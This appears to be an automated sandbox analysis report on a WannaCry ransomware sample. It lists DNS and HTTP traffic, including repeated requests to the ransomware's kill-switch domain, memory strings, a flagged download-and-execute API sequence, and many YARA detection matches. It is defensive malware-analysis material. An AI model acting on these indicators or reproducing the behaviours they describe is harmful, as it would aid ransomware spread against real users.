Source: unknown | DNS traffic detected: query: teasgj.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: xinoyg.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: vurdyj.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: cxfuoy.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: asesdh.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: ibhjiz.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: ayxohj.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: bxoqpu.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: pqjxkf.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: iodilu.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: ajiunz.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: gefpqv.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: mipimr.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: hpqelp.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: tdfkhn.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: nbfpvs.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: sjotuu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: emjlon.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: uhcquu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: nuzyfp.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yuayzn.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: zaobbc.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: xaatge.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: onmwqv.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: kqurib.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: wabuqy.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pombmi.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pxbypa.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eekkiz.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ueercj.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: rjajzc.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: faepoi.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eayzaw.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eyakeo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: aantza.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: loozpo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: cqofos.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mdrnku.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ldyouw.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ikgcbn.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ouyghe.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: flcdqa.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yurwei.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: uqghqa.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eaqtlo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: tlmowf.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: osbytn.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: duomeu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: igeeyv.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ttviky.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yivanc.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: iqhufw.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: exjeos.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: atiajo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: izuupl.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ypfefo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: jzeiry.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: iuwutz.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: oktbec.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: jrkbyt.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: hhvuzb.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: omxsxm.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: zsljps.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pvyeyr.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: lovzje.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ebalrg.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: oeyeob.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: vuhaba.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: gfjioe.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: zmquum.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yraxyh.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: kyivtg.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: cododi.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ovgvxa.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: zynrye.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ybeujn.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mrbfyf.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: hyevqm.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yzwoea.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: peyuye.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: syeyep.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eaqmly.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mupjvv.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: lyeaew.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: txaoos.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ibmzei.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: jiqvfz.com replaycode: Name error (3)
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 104.16.173.80 104.16.173.80
                Source: Joe Sandbox ViewIP Address: 104.16.173.80 104.16.173.80
                Source: svchost.exe, 00000015.00000002.919070637.00000259A18C6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.493124863.00000259A18C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: @http://www.facebook.com equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000001C.00000000.540958832.000002BE77DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                Source: lsass.exe, 00000008.00000000.402548409.0000025A31B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925380773.0000025A31B5B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.396242500.0000025A31B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: lsass.exe, 00000008.00000000.396441163.0000025A31BA1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.920042715.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925324135.0000025A31B56000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: svchost.exe, 0000000D.00000000.410070465.0000020137EB6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.927888936.0000020137EB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cdn.content.prod.cms.msn.com/singletile/summary/alias/experiencebyname/today?market=en-US&sou
                Source: lsass.exe, 00000008.00000002.919611200.0000025A31A00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401417255.0000025A31A00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.918660611.000002974C200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: lsass.exe, 00000008.00000000.396441163.0000025A31BA1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.920042715.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395947661.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925324135.0000025A31B56000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: lsass.exe, 00000008.00000000.396619135.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.923554018.0000025A31AC4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402784904.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: lsass.exe, 00000008.00000000.396441163.0000025A31BA1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.920042715.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395947661.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925324135.0000025A31B56000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: lsass.exe, 00000008.00000000.401546435.0000025A31A23000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395096277.0000025A31A23000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.920850425.0000025A31A23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: lsass.exe, 00000008.00000000.401321528.0000025A312C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.394346103.0000025A312C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.916563876.0000025A312C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.396441163.0000025A31BA1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.920042715.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: lsass.exe, 00000008.00000000.396619135.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.923554018.0000025A31AC4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402784904.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395947661.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925324135.0000025A31B56000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                Source: lsass.exe, 00000008.00000000.396619135.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395947661.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.393560717.0000025A3124D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.911214683.0000025A3124D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.923554018.0000025A31AC4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.924163060.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401126485.0000025A3124D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402784904.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000018.00000000.520202728.000002670D023000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.msoft
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395947661.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925324135.0000025A31B56000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
                Source: svchost.exe, 00000015.00000002.919070637.00000259A18C6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.493124863.00000259A18C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
                Source: mssecsvc.exe.2.drString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                Source: mssecsvc.exe, 00000004.00000002.706316354.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
                Source: svchost.exe, 0000000D.00000000.410070465.0000020137EB6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.409683873.0000020137E40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.927888936.0000020137EB6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.926140445.0000020137E40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-US
                Source: svchost.exe, 0000001C.00000002.937868047.000002BE7A000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.558927925.000002BE7A000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://site-cdn.onenote.net/161182431559_Images/LiveTileImages/MediumAndLarge/Image1.png
                Source: mssecsvc.exe, 00000006.00000002.474520495.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.kryptoslogic.com
                Source: unknownDNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B027A7 GetTempFileNameA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CreateProcessA,InternetCloseHandle,InternetCloseHandle,4_2_00B027A7
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: loaddll32.exe, 00000000.00000002.385381215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\tasksche.exe	Code function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!19_2_004014A6
Source: Yara match	File source: HFKDS6VcNO.dll, type: SAMPLE
Source: Yara match	File source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.388012447.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.385980083.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.396243293.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.486435821.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.382876162.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.390959066.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.385586477.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.392159166.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.384164421.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.381472054.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 5092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 1504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 3296, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\mssecsvc.exe, type: DROPPED

System Summary

Source: HFKDS6VcNO.dll, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: HFKDS6VcNO.dll, type: SAMPLE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
